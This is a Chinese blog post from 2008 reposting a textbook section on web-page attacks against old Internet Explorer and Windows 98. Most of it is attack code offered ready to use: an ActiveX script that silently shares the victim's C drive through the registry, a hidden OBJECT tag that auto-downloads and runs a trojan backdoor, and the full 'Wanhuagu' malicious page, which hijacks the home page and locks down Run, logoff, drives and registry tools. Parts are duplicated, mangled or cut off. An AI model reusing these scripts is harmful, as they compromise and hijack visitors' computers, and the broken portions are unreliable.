对网页攻击的解释

六月 20, 2008

对网页攻击的解释

Filed under: 乱7八糟 — 标签：对网页攻击的解释 — admin @ 9:38 上午

由于Microsoft的浏览器存在着严重的安全漏洞，导致人们在日常浏览网页时使系统遭受攻击，比如：万花谷病毒、混客炸弹、恶意代码、浏览网页时被加载木马、格式化硬盘、共享硬盘等。接下来看看这些攻击者是如何来利用别人在浏览网页时攻击他人计算机的。

5.7.1 攻击类
1. 共享他人硬盘
在Windows 98中存在个共享漏洞，即在注册表的以下键值中：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加个键如C$然后再加几个键值：

“Flags”=dword:00000302

“Type”=dword:00000000

“Path”=”C:\\”

这样系统就会把C盘设为共享了，共享名为RWC$，而且网络属性中还看不到。如果把”Flags”=dword:00000302 改成

“Flags”=dword:00000402

就可看到，源程序如下：
代码片断******************************************************************************

document.write(“”);

function f(){

a1=document.applets[0];

a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}”);

a1.createInstance();

Shl = a1.GetObject();

Shl.RegWrite (“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags”,402,”REG_DWORD” );

Shl.RegWrite (“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type”,0,”REG_DWORD” );

Shl.RegWrite (“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path”,”C:\\” );

}

function init()

{

setTimeout(“f()”, 1000);

}

init();

******************************************************************************
将上面代码另存为htm，这样当对方浏览过这个页面的时候，对方的C盘就被悄悄地共享了。

2. 通过网页加载木马
当受害者用浏览器浏览一个网页的时候，一个EXE的文件就在后台悄悄地被自动下载并运行，攻击者可以把这个EXE换成一个很小的木马(比如孤独剑客的WinShell，大小只有5k)。当受害者浏览该网页后，该木马就被悄悄地下载并运行，从而受害者的计算机就会被打开了一个后门，为攻击者提供了入侵的窗口，源程序如下：
代码片断如下：
******************************************************************************

run_exe=”<OBJECT ID=\”RUNIT\” WIDTH=0 HEIGHT=0 TYPE=\”application/x-oleobject\”"

run_exe+=”CODEBASE=\”server.exe#version=1,1,1,1\”>”

run_exe+=”<PARAM NAME=\”_Version\” value=\”65536\”>”

run_exe+=”</OBJECT>”

run_exe+=”<Html><h1>网页加载中，请稍后….</h1></Html>”;

document.open();

document.clear();

document.writeln(run_exe);

document.close();

</script>
******************************************************************************

将以上代码另存为htm文件后，同server.exe(木马)上传到一个主页空间里。当受害者浏览该网页看到“网页加载中，请稍后….”的时候，那个同路径下的server.exe文件也会被无条件执行。

5.7.2 破坏类
1. 使CPU满负荷运转
下面的代码将使IE5崩溃，或者造成CPU使用率达到 100%，源程序如下：
代码片断如下：
******************************************************************************

<form>

</form>

</body>

******************************************************************************
阅读底色.. 默认设置淡蓝海洋明黄清俊绿意淡雅红粉世家白雪天地灰色世界字体大小.. 默认设置小中中大大

第5章入侵者攻击方法
5.7 基于网页的攻击

5.7.1 攻击类
1. 共享他人硬盘
在Windows 98中存在个共享漏洞，即在注册表的以下键值中：

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面添加个键如C$然后再加几个键值：

“Flags”=dword:00000302

“Type”=dword:00000000

“Path”=”C:\\”

这样系统就会把C盘设为共享了，共享名为RWC$，而且网络属性中还看不到。如果把”Flags”=dword:00000302 改成

“Flags”=dword:00000402

就可看到，源程序如下：
代码片断如下：
将上面代码另存为htm，这样当对方浏览过这个页面的时候，对方的C盘就被悄悄地共享了。

2. 通过网页加载木马
当受害者用浏览器浏览一个网页的时候，一个EXE的文件就在后台悄悄地被自动下载并运行，攻击者可以把这个EXE换成一个很小的木马(比如孤独剑客的WinShell，大小只有5k)。当受害者浏览该网页后，该木马就被悄悄地下载并运行，从而受害者的计算机就会被打开了一个后门，为攻击者提供了入侵的窗口，源程序如下：
代码片断如下：******************************************************************************

run_exe=”<OBJECT ID=\”RUNIT\” WIDTH=0 HEIGHT=0 TYPE=\”application/x-oleobject\”"

run_exe+=”CODEBASE=\”server.exe#version=1,1,1,1\”>”

run_exe+=”<PARAM NAME=\”_Version\” value=\”65536\”>”

run_exe+=”</OBJECT>”

run_exe+=”<Html><h1>网页加载中，请稍后….</h1></Html>”;

document.open();

document.clear();

document.writeln(run_exe);

document.close();

</script>

******************************************************************************

5.7.2 破坏类
1. 使CPU满负荷运转
下面的代码将使IE5崩溃，或者造成CPU使用率达到 100%，源程序如下：
代码片断如下：******************************************************************************

<form>

</form>

</body>

******************************************************************************

攻击者将以上代码生成htm文件，当受害者浏览该网页时就会受到攻击。

2. Windows98蓝屏攻击
下面的代码是利用Windows 98系统漏洞，可以使Windows 98蓝屏死机，源程序如下：
代码片断如下：
******************************************************************************

**************另存为htm文件后，当打开此网页Windows 98系统就会出现蓝屏死机，Windows ME、Windows 2000、Windows XP不受此漏洞影响。

3. 更改注册表的恶意代码
当在浏览某一个网站后，发现IE的标题、主页的默认地址等都被改的乱七八糟，接下来就以万花谷代码为例，看看如何通过网页来更改注册表的，“万花谷”代码如下：
代码片断如下：
******************************************************************************

<HTML>

<HEAD>

<!– var Words =” <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>

<HTML><HEAD><TITLE>www.on888.home.chinaren.com</TITLE>

</HEAD>

<tr>

<td width=400 height=200><center><span id=holder class=”30pt”>很棒的光效。请在图上单击鼠标。

</span></center></td>

</tr>

</table>

<p>

var g_numlights = 0;

var blurbs = new Array(

“很棒的光效。请在图上单击鼠标。.”,

“使用了光效滤镜。每次在图上单击鼠标,就会加一种光效。”,

“移动鼠标，光柱还能跟随变动。”,

“浏览器要求为IE4.0以上。”

);

window.onload = setlights;

document.onclick=keyhandler;

flttgt.onmousemove=mousehandler;

//设置光效

function setlights(){

flttgt.filters[0].clear();

flttgt.filters[0].addcone(0,0,5,100,100,255,255,0,60,15);

if(g_numlights>0){

flttgt.filters[0].addcone(0,200,5,100,100,255,0,0,60,15);

if(g_numlights>1){

flttgt.filters[0].addcone(200,200,5,100,100,0,255,255,60,15);

if(g_numlights>2){

flttgt.filters[0].addcone(200,0,5,100,100,255,0,255,60,15);

}

//让四种光效反复循环

function keyhandler(){

g_numlights = (g_numlights += 1)%4;

holder.innerHTML = blurbs[g_numlights];

setlights();

}

//让光柱追随鼠标的移动

function mousehandler(){

x = (window.event.x – 80);

y = (window.event.y – 80);

flttgt.filters[0].movelight(0,x,y,5,1);

if( g_numlights > 0 ){

flttgt.filters[0].movelight(1,x,y,5,1);

if( g_numlights > 1 ){

flttgt.filters[0].movelight(2,x,y,5,1);

if( g_numlights > 2 ){

flttgt.filters[0].movelight(3,x,y,5,1);

}

</script>

</center>

document.write(“<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>”;

//this function is only needed if you add favorites or links

function AddFavLnk(loc, DispName, SiteURL)

{

var Shor = Shl.CreateShortcut(loc + “\\” + DispName +”.URL”;

Shor.TargetPath = SiteURL;

Shor.Save();

}

//end add favorites or links function

function f(){

try

{

//ActiveX initialization

a1=document.applets[0];

a1.setCLSID(“{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}”;

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID(“{0D43FE01-F093-11CF-8940-00A0C9054228}”;

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID(“{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}”;

a1.createInstance();

Net = a1.GetObject();

try

{

if (document.cookie.indexOf(“Chg” == -1)

{

//set home page

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”, “http://www.on888.home.chinaren.com/”;;

var expdate = new Date((new Date()).getTime() + (1));

document.cookie=”Chg=general; expires=” + expdate.toGMTString() + “; path=/;”

//end set home page

//Write Regedit

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer \\NoRun”, 01, “REG_BINARY”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer \\NoClose”, 01, “REG_BINARY”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer \\NoLogOff”, 01, “REG_BINARY”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer \\NoDrives”, “00000004″, “REG_DWORD”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System \\DisableRegistryTools”, “00000001″, “REG_DWORD”;

Shl.RegWrite

(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer \\NoDesktop”,”00000001″,”REG_DWORD”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp \\Disabled”, “00000001″, “REG_DWORD”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp \\NoRealMode”, “00000001″, “REG_DWORD”;

Shl.RegWrite (“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon \\LegalNoticeCaption”, “欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”;

Shl.RegWrite (“HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText”, “欢迎来到万花谷!你中了※万花奇毒※.请与OICQ:4040465联系!”;

Shl.RegWrite (“HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title”, “欢迎来到万花谷!请与OICQ:4040465联系!”;

Shl.RegWrite (“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title”, “欢迎来到万花谷!请与OICQ:4040465联系!”;

var expdate = new Date((new Date()).getTime() + (1));

document.cookie=”Chg=general; expires=” + expdate.toGMTString() + “; path=/;”

//end Write Regedit

//add favorites this is the common part; should be here if you want to add favorites

var WF, Shor, loc;

WF = FSO.GetSpecialFolder(0);

loc = WF + “\\Favorites”;

if(!FSO.FolderExists(loc))

{

loc = FSO.GetDriveName(WF) + “\\Documents and Settings\\” + Net.UserName + “\\Favorites”;

if(!FSO.FolderExists(loc))

{

return;

}

//end common part

//the following line is used for adding favorites.

//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.

AddFavLnk(loc, “万花谷”, “http://969.ccoo.com”/;;

//end add favorites

}

catch(e)

{}

}

catch(e)

{}

}

function init()

{

setTimeout(“f()”, 1000);

}

init();

</script>

</BODY></HTML>

” //put your cripto code there

function SetNewWords()

{

var NewWords;

NewWords = unescape(Words);

document.write(NewWords);

}

SetNewWords();

// –>

</SCRIPT>

******************************************************************************

Comments (0)

评论暂缺 »

还没有任何评论。

这篇文章上的评论的 RSS feed TrackBack URL

留下评论

要发表评论，您必须先登录。

LINUXQQ

六月 20, 2008